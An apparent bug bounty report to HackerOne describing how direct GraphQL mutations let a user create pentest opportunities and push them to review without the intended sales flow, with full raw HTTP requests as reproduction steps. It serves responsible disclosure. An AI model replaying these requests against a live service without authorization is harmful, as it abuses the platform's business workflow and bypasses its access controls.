An attacker can submit a Pentest Opportunity and change the status of the opportunity from submitted to in_review or reviewed

#Summary: I tried my best to look for any visible feature or functionality through which I can create a pentest opportunity in my demo organization but didn't find any. Also looking into hackerone pentests on the internet I only got html forms to send my details and someone from the support team reaches out to me. However through a graphql mutation - ` createPentestOpportunity` I was able to create pentest opportunities in my demo org(and assuming this is true for other customers also having non-demo orgs without going through the proper flow ) and as soon as it is sent for review a derived pentest is also created. #Steps To Reproduce 1. Create a demo organization in hackerone. 2. Send this request using your cookies & csrf-token and the `organization_id`: ``` POST /graphql HTTP/1.1 Host: hackerone.com Cookie: <COOKIES> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://hackerone.com/bugs?subject=user&report_id=2036649&view=open&substates%5B%5D=new&substates%5B%5D=needs-more-info&substates%5B%5D=pending-program-review&substates%5B%5D=triaged&substates%5B%5D=pre-submission&substates%5B%5D=retesting&reported_to_team=&text_query=&program_states%5B%5D=2&program_states%5B%5D=3&program_states%5B%5D=4&program_states%5B%5D=5&sort_type=latest_activity&sort_direction=descending&limit=25&page=1 Content-Type: application/json X-Csrf-Token: <CSRF-TOKEN> X-Product-Area: other X-Product-Feature: other X-Datadog-Origin: rum X-Datadog-Parent-Id: 7607766352867302438 X-Datadog-Sampling-Priority: 1 X-Datadog-Trace-Id: 5479493917599437707 Content-Length: 452 Origin: https://hackerone.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close {"query": "mutation {\r\n createPentestOpportunity(\r\n input: {\r\n company_name: \"My Company\"\r\n customer_email: \"[email protected]\"\r\n organization_id: <ORG-ID>\r\n name: \"My Pentest\"\r\n }\r\n ) {\r\n clientMutationId\r\n pentest_opportunity {\r\n id\r\n token\r\n }\r\n errors {\r\n edges{node{message}}\r\n total_count\r\n }\r\n was_successful\r\n }\r\n}\r\n"} ``` You can find the `organization_id` by searching for that field name in your burp history. It is the `_id` field's value - {F2448919} 3. The pentest opportunity is successfully created. In the response you'll find the ID and the token of the opportunity. 4. Send this request to send your opportunity for review: ``` POST /graphql HTTP/1.1 Host: hackerone.com Cookie: <COOKIES> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://hackerone.com/opportunities/all Content-Type: application/json X-Csrf-Token: <CSRF-TOKEN> X-Product-Area: other Content-Type: application/json X-Product-Feature: other X-Datadog-Origin: rum X-Datadog-Parent-Id: 7607766352867302438 X-Datadog-Sampling-Priority: 1 X-Datadog-Trace-Id: 5479493917599437707 Content-Length: 305 Origin: https://hackerone.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close {"query": "mutation {\r\n reviewPentestOpportunity(\r\n input: {\r\n pentest_opportunity_id: \"<ID-FROM-STEP-3>\" }) {\r\n clientMutationId\r\n errors {\r\n total_count\r\n edges{node{message}}\r\n }\r\n was_successful\r\n }\r\n}\r\n"} ``` The opportunity is successfully sent for review. 5. Now come to your browser, open your demo organization's engagements. There you will find a pentest opportunity in pending review form(ignore the errors for now since it was create purely from burp and that too for testing, many arguments are skipped for convenience) 6. Go to pentest tab under engagements, you'll also find a derived pentest there under review(currently I'm looking at what I can do with it from my end) {F2448944} {F2448945} ## Impact Users/Customers can create pentest engagements without going through the proper flow and send it for review to the h1 pentest team.